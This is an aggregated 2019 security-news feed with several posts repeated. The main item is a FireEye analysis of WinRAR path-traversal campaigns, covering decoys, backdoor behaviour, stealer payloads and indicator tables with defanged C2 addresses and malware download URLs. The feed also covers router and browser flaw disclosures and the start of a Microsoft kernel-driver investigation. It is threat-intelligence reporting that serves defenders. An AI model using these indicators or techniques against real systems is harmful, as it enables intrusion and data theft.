  • Hover over links to see and verify the URL. If someone sends you a link to “update your software,” hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.
  • Be cautious of emails asking you to take action. If you receive a message asking you to update your software, don’t click on anything within the message. Instead, go straight to your software provider’s website. This will prevent you from downloading malicious content from phishing links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams appeared first on McAfee Blogs.



McAfee Blogs

Singapore Vendor Suffered Data Breach Compromising Details Of 800K Blood Donors

Another massive data breach hits Singapore as investigations reveal new facts. Earlier this month, Singapore’s Health Sciences Authority (HSA) disclosed

Singapore Vendor Suffered Data Breach Compromising Details Of 800K Blood Donors on Latest Hacking News.

Asus Employees Exposed Their Corporate Passwords On Github

Asus recently made it to the news due to Operation ShadowHammer that affected 1 million users. While the chaos isn’t

Asus Employees Exposed Their Corporate Passwords On Github on Latest Hacking News.

Mozilla Fixed Critical Vulnerabilities In Thunderbird 60.6.1

Mozilla recently rolled out patches for two critical vulnerabilities in its Thunderbird email client. The vulnerabilities allegedly affected its IonMonkey

Mozilla Fixed Critical Vulnerabilities In Thunderbird 60.6.1 on Latest Hacking News.

The State of Security: Tripwire Patch Priority Index for March 2019

Tripwire’s March 2019 Patch Priority Index (PPI) brings together the top vulnerabilities for March 2019. First on the patch priority list this month are patches for Microsoft’s Browser, Scripting Engine and VBScript. These patches resolve 23 vulnerabilities, including fixes for Memory Corruption, Elevation of Privilege, Security Feature Bypass and Remote Code Execution vulnerabilities. Next on […]… Read More

The post Tripwire Patch Priority Index for March 2019 appeared first on The State of Security.



The State of Security

Tripwire Patch Priority Index for March 2019

Tripwire’s March 2019 Patch Priority Index (PPI) brings together the top vulnerabilities for March 2019. First on the patch priority list this month are patches for Microsoft’s Browser, Scripting Engine and VBScript. These patches resolve 23 vulnerabilities, including fixes for Memory Corruption, Elevation of Privilege, Security Feature Bypass and Remote Code Execution vulnerabilities. Next on […]… Read More

The post Tripwire Patch Priority Index for March 2019 appeared first on The State of Security.

Hackers May Exploit UC Browser Design Flaw To Deliver Malware

The Chinese UC browser has become immensely popular among Android users. Almost every other Android phone has this browser installed

Hackers May Exploit UC Browser Design Flaw To Deliver Malware on Latest Hacking News.

E Hacking News – Latest Hacker News and IT Security News: TP-Link’s SR20 Smart Home Router Discovered To Come With a Vulnerability As Per Google Security Researcher




TP-Link's SR20 Smart Home Router is recently discovered to come with a vulnerability allowing arbitrary command execution from a local network connection as per a Google security researcher Matthew Garrett. The router, launched in 2016, uncovered various commands that come with root privileges and do not even require validation.

The endeavor was uncovered by the researcher after he was unable to request a reaction from TP-Link, and even published a proof-of-concept to exhibit the said weakness.

Garrett took to twitter to clarify that the TP Link SR20 Smart Home Router accompanying TDDP (TP- Device Debug Protocol), which is influenced with a few vulnerabilities, and one of them is that version 1 commands are 'exposed' for attackers to exploit.

He says that these uncovered directions enable aggressors to send an order containing a filename, a semicolon, to execute the procedure.

 “This connects back to the machine that sent the command and attempts to download a file via TFTP (Trivial File Transfer Protocol) corresponding to the filename it sent. The main TDDP process waits up to four seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialized earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test () is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since TDDP is running as root, you get arbitrary command execution as root,” he explains on his blog.

In spite of the fact that Garrett says he reported to TP-Link of this vulnerability in December, by means of its security disclosure form, the page disclosed to him that he would get a reaction within three days, however hasn't heard back from them till date. He additionally said that he tweeted at TP-Link with respect to the issue, yet that gathered no reaction either.




E Hacking News - Latest Hacker News and IT Security News

TP-Link’s SR20 Smart Home Router Discovered To Come With a Vulnerability As Per Google Security Researcher




TP-Link's SR20 Smart Home Router is recently discovered to come with a vulnerability allowing arbitrary command execution from a local network connection as per a Google security researcher Matthew Garrett. The router, launched in 2016, uncovered various commands that come with root privileges and do not even require validation.

The endeavor was uncovered by the researcher after he was unable to request a reaction from TP-Link, and even published a proof-of-concept to exhibit the said weakness.

Garrett took to twitter to clarify that the TP Link SR20 Smart Home Router accompanying TDDP (TP- Device Debug Protocol), which is influenced with a few vulnerabilities, and one of them is that version 1 commands are 'exposed' for attackers to exploit.

He says that these uncovered directions enable aggressors to send an order containing a filename, a semicolon, to execute the procedure.

 “This connects back to the machine that sent the command and attempts to download a file via TFTP (Trivial File Transfer Protocol) corresponding to the filename it sent. The main TDDP process waits up to four seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialized earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test () is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since TDDP is running as root, you get arbitrary command execution as root,” he explains on his blog.

In spite of the fact that Garrett says he reported to TP-Link of this vulnerability in December, by means of its security disclosure form, the page disclosed to him that he would get a reaction within three days, however hasn't heard back from them till date. He additionally said that he tweeted at TP-Link with respect to the issue, yet that gathered no reaction either.


Unpatched Zero-Days in Microsoft Edge and IE Browsers Disclosed Publicly

Exclusive — A security researcher today publicly disclosed details and proof-of-concept exploits for two 'unpatched' zero-day vulnerabilities in Microsoft's web browsers after the company allegedly failed to respond to his responsible private disclosure. Both unpatched vulnerabilities—one of which affects the latest version of Microsoft Internet Explorer and another affects the latest Edge

Critical Magento SQL Injection Vulnerability Discovered – Patch Your Sites

If your online e-commerce business is running over the Magento platform, you must pay attention to this information. Magento yesterday released new versions of its content management software to address a total of 37 newly-discovered security vulnerabilities. Owned by Adobe since mid-2018, Magento is one of the most popular content management system (CMS) platform that powers 28% of

Kaspersky Lab official blog: Using WinRAR? Install this update right away

Everybody knows that clicking on EXE files can be dangerous. Some people are even aware of the potential risks of opening MS Office files, which can also contain malware. But what can go wrong if you simply unpack a WinRAR archive? Actually, quite a lot.

If you are one of the 500 million people worldwide using WinRAR, you are a perfect target for hijackers. It was recently discovered that every version of WinRAR released in the last 19 years has a critical bug that allows cybercriminals into your computer. Now more than 100 ways to exploit it have been identified — and that number keeps going up.

How the 19-year-old WinRAR bug works

The security flaw enables hijackers to create malicious RAR archives. As soon as this archive is unpacked, a malicious executable file is silently extracted into the Startup folder. On the next reboot this file will be automatically launched, thus infecting your computer with whatever payload the file contains.

To pass undetected even by the most cautious of us, the malefactors usually give this EXE file very innocent-looking names, such as GoogleUpdate.exe.

It should go without saying that malicious archives and the e-mails that contain them are designed to make the victim push the extract button. The lures vary greatly. Sometimes hackers opt for bait labeled as adult images, sometimes they compose an extremely attractive job offer, sometimes they alert you of a terrorist attack risk. In some cases, malefactors pretend to send some technical documents, or inform you about recent changes to local legislation. Some even invite you to download a pirated copy of a hit album, for example, by Ariana Grande.

One way or another, the core idea is that nobody sees much harm in unpacking the archive, so many people click without giving it a second thought.

What happens when the bug is exploited

The malware payloads can be anything: remote access tools of different kinds, enabling hijackers to capture your screen and upload or download files to or from your device, or a banking Trojan, or ransomware, or any other of the innumerable malware species out there.

The most recent example of malware spreading using the WinRAR vulnerability is JNEC.a, new ransomware that locks all of the files on an infected device. At the moment, the cybercriminals are asking for a relatively modest ransom to decrypt your data: 0.05 bitcoins (about $200).

How to protect yourself against malware spreading through WinRAR bug

  • Update your WinRAR right away. Unfortunately, there’s no automatic update, so you have to do it manually. Go to the official WinRAR website, download version 5.70, and install it.
  • To stay on the safe side, do not open any archives you receive from unknown senders.
  • Use a reliable security solution such as Kaspersky Internet Security to immunize your system against potential attack.


Kaspersky Lab official blog

Cisco botched patches for its RV320/RV325 routers

Cisco RV320 and RV325 WAN VPN routers are still vulnerable to attack through two flaws that Cisco had supposedly patched. #Cisco Small Business Routers still vulnerable to remote code execution & configuration export due to incomplete patch 🚨 #RCE #RV320 #RV325 New advisories: https://t.co/fPzrrkb3Hk https://t.co/xZex3wdfpb https://t.co/iZUuCCEnGx — RedTeam Pentesting (@RedTeamPT) March 27, 2019 There are still many vulnerable devices CVE-2019-1652 and CVE-2019-1653 were discovered in September 2018 by security experts from RedTeam Pentesting and disclosed … More

The post Cisco botched patches for its RV320/RV325 routers appeared first on Help Net Security.

McAfee Blogs: iOS Users: Update Your Software to Avoid Security Vulnerabilities

On Monday, Apple made some bold announcements at their keynote event, including new subscription offerings for news, television, video games, and a credit card service. But while these exciting announcements were being made, the release of iOS 12.2 seemed to slip under the radar. This update contains 51 different security fixes and impacts devices ranging from the iPhone 5s and later, the iPad Air, and even products running tvOS. These software patches cover a variety of bugs that cybercriminals could use to obtain effects like denial-of-service, overwrite arbitrary files, or execute malicious code.

The iOS 12.2 update includes patches for vulnerabilities in core apps like Contacts, FaceTime, Mail, Messages, and more. According to security professional Alex Stamos, most of the vulnerabilities were found in Webkit, the browser engine Apple uses in many of its products including Safari, Mail, and App Store. Among these vulnerabilities were memory corruption bugs, which could lead to arbitrary code execution. This type of attack allows malicious actors to run any command on the target system, potentially taking over the victim’s files or allowing them to take over the victim’s system remotely. To prevent arbitrary code execution attacks, Apple improved device memory handling, state, and management. These processes control and coordinate device computer memory in order to optimize overall system performance. Another issue patched by this update is the ability for a cybercriminal to bypass sandbox restrictions, which protect a device’s critical infrastructure from suspicious code. To combat this, Apple issued an improvement to validation checks.

While it can be easy to click the “Update Later” option when you receive a software update notification, the security updates included in iOS 12.2 should not be overlooked. To help keep your iOS devices protected and running smoothly, check out the following tips:

  • Update your software. To update your device to iOS 12.2, go to your Settings, then to General, and then click Software Update. From there, you will be able to download and install the update and patch over 50 security holes.
  • Turn on automatic updates. Turning on automatic updates helps shield you from exposure to threats brought on by software bugs and vulnerabilities. You can enable automatic updates in your Settings as well.
  • Use a security solution. To add an extra layer of protection to all your devices, install a security solution like McAfee Total Protection. This will allow you to have an extra security weapon and help defend your devices from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post iOS Users: Update Your Software to Avoid Security Vulnerabilities appeared first on McAfee Blogs.



McAfee Blogs

iOS Users: Update Your Software to Avoid Security Vulnerabilities

On Monday, Apple made some bold announcements at their keynote event, including new subscription offerings for news, television, video games, and a credit card service. But while these exciting announcements were being made, the release of iOS 12.2 seemed to slip under the radar. This update contains 51 different security fixes and impacts devices ranging from the iPhone 5s and later, the iPad Air, and even products running tvOS. These software patches cover a variety of bugs that cybercriminals could use to obtain effects like denial-of-service, overwrite arbitrary files, or execute malicious code.

The iOS 12.2 update includes patches for vulnerabilities in core apps like Contacts, FaceTime, Mail, Messages, and more. According to security professional Alex Stamos, most of the vulnerabilities were found in Webkit, the browser engine Apple uses in many of its products including Safari, Mail, and App Store. Among these vulnerabilities were memory corruption bugs, which could lead to arbitrary code execution. This type of attack allows malicious actors to run any command on the target system, potentially taking over the victim’s files or allowing them to take over the victim’s system remotely. To prevent arbitrary code execution attacks, Apple improved device memory handling, state, and management. These processes control and coordinate device computer memory in order to optimize overall system performance. Another issue patched by this update is the ability for a cybercriminal to bypass sandbox restrictions, which protect a device’s critical infrastructure from suspicious code. To combat this, Apple issued an improvement to validation checks.

While it can be easy to click the “Remind Me Later” option when you receive a software update notification, the security updates included in iOS 12.2 should not be overlooked. To help keep your iOS devices protected and running smoothly, check out the following tips:

  • Update your software. To update your device to iOS 12.2, go to your Settings, then to General, and then click Software Update. From there, you will be able to download and install the update and patch over 50 security holes.
  • Turn on automatic updates. Turning on automatic updates helps shield you from exposure to threats brought on by software bugs and vulnerabilities. You can enable automatic updates in your Settings as well.
  • Use a security solution. To add an extra layer of protection to all your devices, install a security solution like McAfee Total Protection. This will allow you to have an extra security weapon and help defend your devices from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post iOS Users: Update Your Software to Avoid Security Vulnerabilities appeared first on McAfee Blogs.

ASUS Hack May Be Biggest Supply-Chain Incident Ever As Backdoor Leaves 1 Million Users Exposed

ASUS Live Update Utility, the online update driver used by ASUS users worldwide, was recently compromised. Hackers added a backdoor

ASUS Hack May Be Biggest Supply-Chain Incident Ever As Backdoor Leaves 1 Million Users Exposed on Latest Hacking News.

ShadowHammer: ASUS software updates exploited to distribute malware

By Waqas

The victims of ShadowHammer malware attack are Windows users. Kaspersky Lab researchers have made a startling new revelation that the world’s leading computer maker ASUS’s live software update system was compromised by cybercriminals to install a backdoor, which affected ASUS customers. The attack occurred in 2018 and according to Kaspersky Lab, the attackers compromised the legitimate […]

This is a post from HackRead.com Read the original post: ShadowHammer: ASUS software updates exploited to distribute malware

WinRAR Zero-day Abused in Multiple Campaigns

WinRAR, an over 20-year-old file archival utility used by over 500 million users worldwide, recently acknowledged a long-standing vulnerability in its code-base. A recently published path traversal zero-day vulnerability, disclosed in CVE-2018-20250 by Check Point Research, enables attackers to specify arbitrary destinations during file extraction of ‘ACE’ formatted files, regardless of user input. Attackers can easily achieve persistence and code execution by creating malicious archives that extract files to sensitive locations, like the Windows “Startup” Start Menu folder. While this vulnerability has been fixed in the latest version of WinRAR (5.70), WinRAR itself does not contain auto-update features, increasing the likelihood that many existing users remain running out-of-date versions. 

FireEye has observed multiple campaigns leveraging this vulnerability, in addition to those already discussed by 360 Threat Intelligence Center. Below we will look into some campaigns we came across that used customized and interesting decoy documents with a variety of payloads including ones which we have not seen before and the ones that used off-the-shelf tools like PowerShell Empire.

Campaign 1: Impersonating an Educational Accreditation Council

Infection Vector

When the ACE file Scan_Letter_of_Approval.rar is extracted with vulnerable WinRAR versions lower than 5.70, it creates a file named winSrvHost.vbs in the Windows Startup folder without the user’s consent. The VBScript file is executed the next time Windows starts up.

Decoy Document

To avoid user suspicion, the ACE file contains a decoy document, “Letter of Approval.pdf”, which purports to be from CSWE, the Council on Social Work Education as shown in Figure 1. This seems to be copied from CSWE website.


Figure 1: Decoy document impersonating CSWE

VBS Backdoor

The VBS file in the Startup folder will be executed by wscript.exe when Windows starts up. The VBS code first derives an ID for the victim using custom logic based on a combination of the ComputerName, Processor_identifier and Username. It obtains these from environment strings, as shown in Figure 2.


Figure 2: Deriving victim ID

Interestingly, the backdoor communicates with the command and control (C2) server using the value of the Authorization HTTP header using the code in Figure 3.


Figure 3: Base64-encoded data in Authorization header

The VBS backdoor first sends the base64-encoded data, including the victim ID and the ComputerName, using the code in Figure 4.


Figure 4: Base64-encoded victim data

It then extracts the base64-encoded data in the Authorization header of the HTTP response from the C2 server and decodes it. The decoded data starts with the instruction code from the C2 server, followed with additional parameters.

C2 Communication

The malware reaches out to the C2 server at 185[.]162.131.92 via an HTTP request. Actual communication is via the Authorization field, as shown in Figure 5.


Figure 5: Communication via Authorization field

Upon decoding the value of the Authorization field, it can be seen that the malware is sending the Victim ID and the computer name to the C2 server. The C2 server responds with the commands in the value of the Authorization HTTP header, as shown in Figure 6.


Figure 6: C2 commands in Authorization field

Upon decoding, the commands are found to be “ok ok”, which we believe is the default C2 command. After some C2 communication, the C2 server responded with instructions to download the payload from hxxp://185.49.71[.]101/i/pwi_crs.exe, which is a Netwire RAT.

Commands Supported by VBS Backdoor

Command

Explanation

d

Delete the VBS file and exit process

Pr

Download a file from a URL and execute it

Hw

Get hardware info

av

Look for antivirus installed from a predefined list.

Indicators

File Name

Hash/IP Address

Scan_Letter_of_Approval.rar

8e067e4cda99299b0bf2481cc1fd8e12

winSrvHost.vbs

3aabc9767d02c75ef44df6305bc6a41f

Letter of Approval.pdf

dc63d5affde0db95128dac52f9d19578

pwi_crs.exe

12def981952667740eb06ee91168e643

C2

185[.]162.131.92

Netwire C2

89[.]34.111.113

Campaign 2: Attack on Israeli Military Industry

Infection Vector

Based on the email uploaded to VirusTotal, the attacker seems to send a spoofed email to the victim with an ACE file named SysAid-Documentation.rar as an attachment. Based on the VirusTotal uploader and the email headers, we believe this is an attack on an Israeli military company.

Decoy Files

The ACE file contains decoy files related to documentation for SysAid, a help desk service based in Israel. These files are shown as they would be displayed in WinRAR in Figure 7.


Figure 7: Decoy files

Thumbs.db.lnk

This LNK file target is ‘C:\Users\john\Desktop\100m.bat’. But when we look at the icon location using a LNK parser, as shown in Figure 8, it points to an icon remotely hosted on one of the C2 servers, which can be used to steal NTLM hashes.


Figure 8: LNK parser output

SappyCache Analysis

Upon extraction, WinRAR copies a previously unknown payload we call SappyCache to the Startup folder with the file name ‘ekrnview.exe’. The payload is executed the next time Windows starts up.

SappyCache tries to fetch the next-stage payload using three approaches:

1) Decrypting a File: The malware tries to read the file at %temp%\..\GuiCache.db. If it is successful, it tries to decrypt it using RC4 to get the C2 URLs, as shown in Figure 9.


Figure 9: Decrypting file at GuiCache.db

2) Decrypting a Resource: If it is not successful in retrieving the C2 URL using the previous method, the malware tries to retrieve the encrypted C2 URLs from a resource section, as shown in Figure 10. If it is successful, it will decrypt the C2 URLs using RC4.


Figure 10: Decrypting a resource

3) Retrieving From C2: If it is not successful in retrieving the C2 URLs using those previous two methods, the malware tries to retrieve the payload from four different hardcoded URLs mentioned in the indicators. The malware creates the HTTP request using the following information:

  • Computer Name, retrieved using the GetComputerNameA function, as the HTTP parameter ‘name’ (Figure 11).


Figure 11: Retrieving computer name using GetComputerNameA

  • Windows operating system name, retrieved by querying the ProductName value from the registry key SOFTWARE\Microsoft\Windows NT\CurrentVersion, as the HTTP parameter ‘key’ (Figure 12).


Figure 12: Retrieving Windows OS name using ProductName value

  • The module name of the malware, retrieved using the GetModuleFileNameA function, as the HTTP parameter ‘page’ (Figure 13).


Figure 13: Retrieving malware module name using using GetModuleFileNameA

  • The list of processes and their module names, retrieved using the Process32First and Module32First APIs, as the HTTP parameter ‘session_data’ (Figure 14).


Figure 14: Retrieving processes and modules using Process32First and Module32First

A fragment of the HTTP request that is built with the information gathered is shown in Figure 15.


Figure 15: HTTP request fragment

If any of the aforementioned methods is successful, the malware tries to execute the decrypted payload. During our analysis, the C2 server did not respond with a next-level payload.

Indicators

File Name/Type

Hash/URL

SysAid-Documentation.rar

062801f6fdbda4dd67b77834c62e82a4 

SysAid-Documentation.rar

49419d84076b13e96540fdd911f1c2f0

ekrnview.exe

96986B18A8470F4020EA78DF0B3DB7D4

Thumbs.db.lnk

31718d7b9b3261688688bdc4e026db99

URL1

www.alahbabgroup[.]com/bakala/verify.php

URL2

103.225.168[.]159/admin/verify.php

URL3

www.khuyay[.]org/odin_backup/public/loggoff.php

URL4

47.91.56[.]21/verify.php

Email

8c93e024fc194f520e4e72e761c0942d

Campaign 3: Potential Attack in Ukraine with Empire Backdoor

Infection Vector

The ACE file named zakon.rar is propagated using a malicious URL mentioned in the indicators. 360 Threat Intelligence Center has also encountered this campaign.

Decoy Documents

The ACE file contains a file named Ukraine.pdf, which contains a message on the law of Ukraine about public-private partnerships that purports to be a message from Viktor Yanukovych, former president of Ukraine (Figure 16 and Figure 17).


Figure 16: Ukraine.pdf decoy file


Figure 17: Contents of decoy file

Based on the decoy PDF name, the decoy PDF content and the VirusTotal uploader, we believe this is an attack on an individual in Ukraine.

Empire Backdoor

When the file contents are extracted, WinRAR drops a .bat file named mssconf.bat in the Startup folder. The batch file contains commands that invoke base64-encoded PowerShell commands. After decoding, the PowerShell commands invoked are found to be the Empire backdoor, as shown in Figure 18. We did not observe any additional payloads at the time of analysis.


Figure 18: Empire backdoor

Indicators

File Name/URL

Hash/URL

zakon.rar

9b19753369b6ed1187159b95fc8a81cd

mssconf.bat

79B53B4555C1FB39BA3C7B8CE9A4287E

C2

31.148.220[.]53

URL

http://tiny-share[.]com/direct/7dae2d144dae4447a152bef586520ef8

Campaign 4: Credential and Credit Card Dumps as Decoys

Decoy Documents

This campaign uses credential dumps and likely stolen credit card dumps as decoy documents to distribute different types of RATs and password stealers.

One file, ‘leaks copy.rar’, used text files that contained stolen email IDs and passwords as decoys. These files are shown as they would be displayed in WinRAR in Figure 19.


Figure 19: Text files containing stolen email credentials as decoy

Another file, ‘cc.rar’, used a text file containing stolen credit card details as a decoy. The file as it would be displayed in WinRAR and sample contents of the decoy file are shown in Figure 20.


Figure 20: Text file containing stolen credit card details as decoy

Payloads

This campaign used payloads from different malware families. To keep the draft concise, we did not include the analysis of all of them. The decompilation of one of the payloads with hash 1BA398B0A14328B9604EEB5EBF139B40 shows keylogging capabilities (Figure 21). We later identified this sample as QuasarRAT.


Figure 21: Keylogging capabilities

The decompilation of all the .NET-based payload shows that much of the code is written in Chinese. The decompilation of malware with hash BCC49643833A4D8545ED4145FB6FDFD2 containing Chinese text is shown in Figure 22. We later identified this sample as Buzy.


Figure 22: Code written in Chinese

The other payloads also have similar keylogging, password stealing and standard RAT capabilities. The VirusTotal submissions show the use of different malware families in this campaign and a wide range of targeting.

Hashes of ACE Files

File Name

Hash

leaks copy.rar

e9815dfb90776ab449539a2be7c16de5

cc.rar

9b81b3174c9b699f594d725cf89ffaa4

zabugor.rar

914ac7ecf2557d5836f26a151c1b9b62

zabugorV.rar

eca09fe8dcbc9d1c097277f2b3ef1081 

Combolist.rar

1f5fa51ac9517d70f136e187d45f69de

Nulled2019.rar

f36404fb24a640b40e2d43c72c18e66b

IT.rar

0f56b04a4e9a0df94c7f89c1bccf830c

Hashes of Payloads

File name

Hash

Malware Family

explorer.exe

1BA398B0A14328B9604EEB5EBF139B40

QuasarRAT

explorer.exe

AAC00312A961E81C4AF4664C49B4A2B2

Azorult

IntelAudio.exe

2961C52F04B7FDF7CCF6C01AC259D767

Netwire

Discord.exe

97D74671D0489071BAA21F38F456EB74

Razy

Discord.exe

BCC49643833A4D8545ED4145FB6FDFD2

Buzy

old.exe

119A0FD733BC1A013B0D4399112B8626

Azorult

FireEye Detection

FireEye detection names for the indicators in the attack:

FireEye Endpoint Security

IOC: WINRAR (EXPLOIT)

MG: Generic.mg

AV: 

  • Exploit.ACE-PathTraversal.Gen
  • Exploit.Agent.UZ
  • Exploit.Agent.VA
  • Gen:Heur.BZC.ONG.Boxter.91.1305E319
  • Gen:Variant.Buzy.2604
  • Gen:Variant.Razy.472302
  • Generic.MSIL.PasswordStealerA.5CBD94BB
  • Trojan.Agent.DPAS
  • Trojan.GenericKD.31783690
  • Trojan.GenericKD.31804183

FireEye Network Security

  • FE_Exploit_ACE_CVE201820250_2
  • FE_Exploit_ACE_CVE201820250_1
  • Backdoor.EMPIRE
  • Downloader.EMPIRE
  • Trojan.Win.Azorult
  • Trojan.Netwire

FireEye Email Security

  • FE_Exploit_ACE_CVE201820250_2
  • FE_Exploit_ACE_CVE201820250_1
  • FE_Backdoor_QUASARRAT_A
  • FE_Backdoor_EMPIRE

Conclusion

We have seen how various threat actors are abusing the recently disclosed WinRAR vulnerability using customized decoys and payloads, and by using different propagation techniques such as email and URL. Because of the huge WinRAR customer-base, lack of auto-update feature and the ease of exploitation of this vulnerability, we believe this will be used by more threat actors in the upcoming days.

Traditional AV solutions will have a hard time providing proactive zero-day detection for unknown malware families. FireEye MalwareGuard, a component of FireEye Endpoint Security, detects and blocks all the PE executables mentioned in this blog post using machine learning. It’s also worth noting that this vulnerability allows the malicious ACE file to write a payload to any path if WinRAR has sufficient permissions, so although the exploits that we have seen so far chose to write the payload to startup folder, a more involved threat actor can come up with a different file path to achieve code execution so that any behavior based rules looking for WinRAR writing to the startup folder can be bypassed. Enterprises should consider blocking vulnerable WinRAR versions and mandate updating WinRAR to the latest version.

FireEye Endpoint Security, FireEye Network Security and FireEye Email Security detect and block these campaigns at several stages of the attack chain.

Acknowledgement

Special thanks to Jacob Thompson, Jonathan Leathery and John Miller for their valuable feedback on this blog post.

Apple fixed some interesting bugs in iOS and macOS

In addition to announcing a number of new products and subscription services, Apple has released security updates for iOS, macOS, Safari, tvOS, iTunes, iCloud, and Xcode. The security updates The update for Xcode – Apple’s integrated environment for developing software for macOS, iOS, watchOS, and tvOS – carries a fix for a single flaw: CVE-2018-4461, a kernel memory corruption issue that has been patched last December in iOS, tvOS, watchOS and macOS Mojave. This fix … More

The post Apple fixed some interesting bugs in iOS and macOS appeared first on Help Net Security.

Tesla Gives Away EV-Maker Model 3 Cars Along With a Hefty Cash Prize to Hackers



Amat Cama and Richard Zhu a team of hackers, who took part in the Pwn2Own 2019 hacking competition, organized by Trend Micro's "Zero Day Initiative (ZDI)" and exposed vulnerability in the vehicle's framework and bagged themselves an Electric Vehicle (EV) - maker Tesla Model 3 cars along with a cash prize of $35,000.

The hackers focused on the infotainment framework on the Tesla Model 3 and utilized a "JIT bug in the renderer" in order to take control of the framework.

In the course of recent years as a part of Tesla's bug bounty program, the company had given away thousands of dollars in remunerations to those hackers who successfully uncovered vulnerabilities in its frameworks and the EV maker was ' fairly quick ' to fix those vulnerabilities uncovered by white hat hackers.

David Lau, Vice President of Vehicle Software at Tesla says, "Since launching our bug bounty programme in 2014, we have continuously increased our investments into partnerships with security researchers to ensure that all Tesla owners constantly benefit from the brightest minds in the community,"

He further adds, “We develop our cars with the highest standards of safety in every respect, and our work with the security research community is invaluable to us. Since launching our bug bounty program in 2014 – the first to include a connected consumer vehicle– we have continuously increased our investments into partnerships with security researchers to ensure that all Tesla owners constantly benefit from the brightest minds in the community. We look forward to learning about, and rewarding, great work in Pwn2Own so that we can continue to improve our products and our approach to designing inherently secure systems,”


E Hacking News – Latest Hacker News and IT Security News: Tesla Gives Away EV-Maker Model 3 Cars Along With a Hefty Cash Prize to Hackers



Amat Cama and Richard Zhu a team of hackers, who took part in the Pwn2Own 2019 hacking competition, organized by Trend Micro's "Zero Day Initiative (ZDI)" and exposed vulnerability in the vehicle's framework and bagged themselves an Electric Vehicle (EV) - maker Tesla Model 3 cars along with a cash prize of $35,000.

The hackers focused on the infotainment framework on the Tesla Model 3 and utilized a "JIT bug in the renderer" in order to take control of the framework.

In the course of recent years as a part of Tesla's bug bounty program, the company had given away thousands of dollars in remunerations to those hackers who successfully uncovered vulnerabilities in its frameworks and the EV maker was ' fairly quick ' to fix those vulnerabilities uncovered by white hat hackers.

David Lau, Vice President of Vehicle Software at Tesla says, "Since launching our bug bounty programme in 2014, we have continuously increased our investments into partnerships with security researchers to ensure that all Tesla owners constantly benefit from the brightest minds in the community,"

He further adds, “We develop our cars with the highest standards of safety in every respect, and our work with the security research community is invaluable to us. Since launching our bug bounty program in 2014 – the first to include a connected consumer vehicle– we have continuously increased our investments into partnerships with security researchers to ensure that all Tesla owners constantly benefit from the brightest minds in the community. We look forward to learning about, and rewarding, great work in Pwn2Own so that we can continue to improve our products and our approach to designing inherently secure systems,”




E Hacking News - Latest Hacker News and IT Security News

From alert to driver vulnerability: Microsoft Defender ATP investigation unearths privilege escalation flaw

With Microsoft continuously improving kernel mitigations and raising the bar for exploiting native kernel components, third-party kernel drivers are becoming a more appealing target for attackers and an important area of research for security analysts. A vulnerability in a signed third-party driver could have a serious impact: it can be abused by attackers to escalate privileges or, more commonly, bypass driver signature enforcement—without the complexity of using a more expensive zero-day kernel exploit in the OS itself.

Computer manufacturers usually ship devices with software and tools that facilitate device management. These software and tools, including drivers, often contain components that run with ring-0 privileges in the kernel. With these components installed by default, each must be as secure as the kernel; even one flawed component could become the Achilles’ heel of the whole kernel security design.

We discovered such a driver while investigating an alert raised by Microsoft Defender Advanced Threat Protection’s kernel sensors. We traced the anomalous behavior to a device management driver developed by Huawei. Digging deeper, we found a lapse in the design that led to a vulnerability that could allow local privilege escalation.

We reported the vulnerability (assigned CVE-2019-5241) to Huawei, who responded and cooperated quickly and professionally. On January 9, 2019, Huawei released a fix: https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190109-01-pcmanager-en.

In this blog post, we’d like to share our journey from investigating one Microsoft Defender ATP alert to discovering a vulnerability, cooperating with the vendor, and protecting customers.

Detecting kernel-initiated code injections with Microsoft Defender ATP

Starting in Windows 10, version 1809, the kernel has been instrumented with new sensors designed to trace User APC code injection initiated by a kernel code, providing better visibility into kernel threats like DOUBLEPULSAR. As described in our in-depth analysis, DOUBLEPULSAR is a kernel backdoor used by the WannaCry ransomware to inject the main payload into user-space. DOUBLEPULSAR copied the user payload from the kernel into an executable memory region in lsass.exe and inserted a User APC to a victim thread with NormalRoutine targeting this region.

figure-01-WannaCry-user-APC-injection-technique-schematic-diagram

Figure 1. WannaCry User APC injection technique schematic diagram

While the User APC code injection technique isn’t novel (see Conficker or Valerino’s earliest proof-of-concept), detecting threats running in the kernel is not trivial. Since PatchGuard was introduced, hooking NTOSKRNL is no longer allowed; there’s no documented way drivers could get notification for any of the above operations. Hence, without proper optics, the only sustainable strategy would be applying memory forensics, which can be complicated.

The new set of kernel sensors aim to address this kind of kernel threat. Microsoft Defender ATP leverages these sensors to detect suspicious operations invoked by a kernel code that might lead to code injection into user-mode. One such suspicious operation, though not related to WannaCry, DOUBLEPULSAR, or other known kernel threats, triggered this investigation that led to our discovery of a vulnerability.

Investigating an anomalous code injection from the kernel

While monitoring alerts related to kernel-mode attacks, one alert drew our attention:

figure-02-2-Microsoft-Defender-ATP-kernel-initiating-code-injection-alert

Figure 2. Microsoft Defender ATP kernel-initiating code injection alert

The alert process tree showed an abnormal memory allocation and execution in the context of services.exe by a kernel code. Investigating further, we found that an identical alert was fired on another machine around the same time.

To get a better understanding of the observed anomaly, we looked at the raw signals we got from the kernel sensors. This analysis yielded the following findings:

  • A system thread called nt!NtAllocateVirtualMemory allocated a single page (size = 0x1000) with PAGE_EXECUTE_READWRITE protection mask in services.exe address space
  • The system thread then called nt!KeInsertQueueApc to queue User APC to a services.exe arbitrary thread with NormalRoutine pointing to the beginning of the executable page and NormalContext pointing to offset 0x800

